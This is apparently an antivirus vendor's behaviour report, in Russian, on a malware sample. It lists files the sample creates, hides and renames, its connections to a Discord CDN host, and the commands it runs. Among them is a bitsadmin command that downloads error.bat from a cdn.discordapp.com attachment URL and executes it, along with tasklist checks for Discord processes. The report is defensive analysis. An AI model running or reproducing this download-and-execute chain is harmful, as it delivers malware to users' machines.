Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\4ce7.tmp\4ce8.tmp\4ce9.bat
- %TEMP%\bit5b1a.tmp
- nul
- <Текущая директория>\message.vbs
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bit5b1a.tmp
Удаляет следующие файлы
- %TEMP%\4ce7.tmp\4ce8.tmp\4ce9.bat
Перемещает следующие файлы
- %TEMP%\bit5b1a.tmp в %TEMP%\error.bat
Сетевая активность
Подключается к
- 'cd#.##scordapp.com':443
TCP
- 'cd#.##scordapp.com':443
UDP
- DNS ASK cd#.##scordapp.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\message.vbs"
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4CE7.tmp\4CE8.tmp\4CE9.bat <Полный путь к файлу>"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4CE7.tmp\4CE8.tmp\4CE9.bat <Полный путь к файлу>"
- '<SYSTEM32>\cmd.exe' /c bitsadmin.exe /transfer "error" https://cdn.discordapp.com/attachments/718157300195655742/718159246629273620/error.bat %TEMP%\error.bat
- '<SYSTEM32>\bitsadmin.exe' /transfer "error" https://cdn.discordapp.com/attachments/718157300195655742/718159246629273620/error.bat %TEMP%\error.bat
- '<SYSTEM32>\cmd.exe' /K %TEMP%\error.bat
- '<SYSTEM32>\tasklist.exe' /fi "imagename eq Discord.exe"
- '<SYSTEM32>\find.exe' ":"
- '<SYSTEM32>\tasklist.exe' /fi "imagename eq DiscordCanary.exe"
- '<SYSTEM32>\tasklist.exe' /fi "imagename eq DiscordPTB.exe"
